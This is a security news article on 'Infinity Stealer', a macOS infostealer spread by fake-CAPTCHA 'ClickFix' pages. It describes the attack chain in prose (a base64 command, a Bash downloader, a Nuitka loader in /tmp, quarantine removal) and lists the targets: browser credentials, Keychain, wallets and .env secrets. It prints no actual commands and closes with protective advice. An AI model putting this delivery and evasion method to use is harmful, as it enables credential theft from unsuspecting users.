Modern Mac Malware “Infinity Stealer” Exploits User Trust with Fake CAPTCHAs
macOS users are facing a new threat: Infinity Stealer, a sophisticated infostealer that leverages a technique called “ClickFix” to trick users into executing malicious code. Discovered by Malwarebytes researchers, this malware marks the first documented campaign combining ClickFix delivery with a Python-based infostealer compiled using Nuitka.
What is ClickFix and Why is it Effective?
ClickFix doesn’t rely on exploiting software vulnerabilities. Instead, it relies on social engineering. Users are presented with a fake CAPTCHA page, mimicking legitimate services like Cloudflare’s human verification. This page instructs them to open the Terminal application and paste a command. Once executed, the infection process begins. This bypasses many traditional security defenses because the user is willingly running the code themselves.
Source: Malwarebytes
How Infinity Stealer Works: A Multi-Stage Attack
The attack begins on the domain update-check[.]com, posing as a Cloudflare verification step. The base64-obfuscated command, when decoded, downloads and executes a Bash script. This script then downloads a Nuitka loader to the /tmp directory, removes the quarantine flag, and executes it. The loader contains a compressed archive holding the final Infinity Stealer payload.
Before stealing data, the malware checks for virtualized or sandboxed environments to avoid analysis. Once active, it targets a wide range of sensitive information.
What Data Does Infinity Stealer Steal?
Infinity Stealer is designed to harvest a significant amount of personal data, including:
- Credentials from Chromium-based browsers and Firefox
- macOS Keychain entries
- Cryptocurrency wallet information
- Plaintext secrets found in developer files (like .env files)
All stolen data is exfiltrated via HTTP POST requests to a command-and-control (C2) server, and the attackers are notified via Telegram upon completion.
Why Nuitka Makes Detection Difficult
The malware’s creators utilize Nuitka, an open-source Python compiler, to convert the Python code into a native macOS binary. This is a key factor in its evasiveness. Unlike tools like PyInstaller, which bundle Python bytecode, Nuitka produces a true native binary, making reverse engineering significantly harder and bypassing many typical detection methods.
Source: Malwarebytes
The Growing Threat Landscape for macOS
The emergence of Infinity Stealer underscores a concerning trend: macOS threats are becoming increasingly sophisticated and targeted. Malwarebytes emphasizes that this is not an isolated incident, and users should expect to see more advanced attacks in the future.
Pro Tip:
Never paste commands into the Terminal that you don’t fully understand, especially those obtained from websites or untrusted sources.
FAQ: Infinity Stealer and macOS Security
Q: What is ClickFix?
A: ClickFix is a social engineering technique that tricks users into running malicious commands in their Terminal.
Q: What does Infinity Stealer target?
A: It targets browser credentials, macOS Keychain entries, cryptocurrency wallets, and secrets in developer files.
Q: Why is Nuitka used in this malware?
A: Nuitka compiles Python code into a native binary, making it harder to analyze and detect.
Q: How can I protect myself?
A: Avoid pasting commands from untrusted sources into your Terminal. Be wary of fake CAPTCHA pages.
Stay informed about the latest threats and practice safe browsing habits. Regularly update your macOS and security software to ensure you have the latest protections.
